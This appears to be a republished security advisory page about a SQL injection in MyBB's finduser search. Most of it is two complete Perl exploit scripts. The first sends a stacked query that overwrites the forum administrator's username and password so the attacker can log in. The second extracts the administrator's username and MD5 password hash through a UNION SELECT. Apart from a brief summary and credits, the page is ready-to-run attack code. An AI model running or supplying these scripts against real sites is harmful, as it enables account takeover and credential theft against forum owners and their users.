MyBB finduser Search SQL Injection (Exploits)Summary
The following two exploits, exploit a vulnerability in MyBB's finduser searching functionality, one will try to add a user named crouz with administrative privileges to the system, while the other will grab the first available administrative username and dump his hashed password.
Credit:
The information has been provided by Alpha Programmer and Devil-00.
Details
Exploits #1:
#!/usr/bin/perl
###########################################
# Crouz.Com Security Team #
###########################################
# EXPLOIT FOR: MyBulletinBoard Search.PHP SQL Injection Vulnerability #
# #
#Expl0it By: A l p h a _ P r o g r a m m e r (sirius) #
#Email: Alpha_Programmer@LinuxMail.ORG #
# #
#This Xpl Change Admin's Pass For L0gin With P0wer User #
# #
#HACKERS PAL & Devil-00 & ABDUCTER are credited with the discovery of this vuln #
# #
###########################################
# GR33tz T0 ==> mh_p0rtal -- Dr-CephaleX -- The-Cephexin -- Djay_Agoustinno #
# No_Face_King -- Behzad185 -- Autumn_Love6(Hey Man You Are Singular) #
# #
# Special Lamerz : Hoormazd & imm02tal :P ++ xshabgardx #
###########################################
use IO::Socket;
if (@ARGV < 2)
{
print "\n==========================================\n";
print " \n -- Exploit By Alpha Programmer(sirius) --\n\n";
print " Crouz Security Team \n\n";
print " Usage: <T4rg3t> <DIR>\n\n";
print "==========================================\n\n";
print "Examples:\n\n";
print " Mybb.pl www.Site.com /mybb/ \n";
exit();
}
my $host = $ARGV[0];
my $dir = $ARGV[1];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );
unless ($remote) { die "C4nn0t C0nn3ct to $host" }
print "C0nn3cted\n";
$http = "GET $dir/search.php?action=finduser&uid=-1' ; update mybb_users set username='da05581c9137f901f4fa4da5a958c273' , password='da05581c9137f901f4fa4da5a958c273' where usergroup=4 and uid=1 HTTP/1.0\n";
$http .= "Host: $host\n\n\n\n";
print "\n";
print $remote $http;
print "Wait For Changing Password ...\n";
sleep(10);
print "OK , Now Login With :\n";
print "Username: crouz\n";
print "Password: crouz\n\n";
print "Enjoy ;)\n\n";
Exploits #2:
#!/usr/bin/perl -w
use LWP::Simple;
if(!$ARGV[0] or !$ARGV[1] or !$ARGV[2]){
print "#########[ MyBB SQL-Injection ]##############\n";
print "# Coded By Devil-00 [ sTranger-killer ] #\n";
print "# Exmp:- mybb.pl www.victem.com mybb 0 0 || To Get Search ID #\n";
print "# Exmp:- mybb.pl www.victem.com mybb searchid 1 || To Get MD5 Hash #\n";
print "# Thnx For [ Xion - HACKERS PAL - ABDUCTER ] #\n";
print "######################### #########\n";
exit;
}
my $host = 'http://'.$ARGV[0];
my $searchid = $ARGV[2];
if($ARGV[3] eq 0){
print "[*] Trying $host\n";
$url = "/".$ARGV[1]."/search.php?action=finduser&uid=-1' UNION SELECT uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,ui d,uid,uid,username,password FROM mybb_users where usergroup=4 and uid=1/*";
$page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $host\n";
$page =~ m/<a href="search\.php\?action=results&sid=(.*?)&sortby=&order=">/ && print "[+] Search ID To Use : $1\n";
exit;
}else{
print "[*] Trying $host\n";
$url = "/".$ARGV[1]."/search.php?action=results&sid=$searchid&sortby=&order=";
$page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $host\n";
$page =~ m/<a href="member\.php\?action=profile&\;uid=1">(.*?)<\/a>/ && print "[+] User ID is: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);
$page =~ m/<a href="forumdisplay\.php\?fid=1">(.*?)<\/a>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
}
推荐
评论(0条)
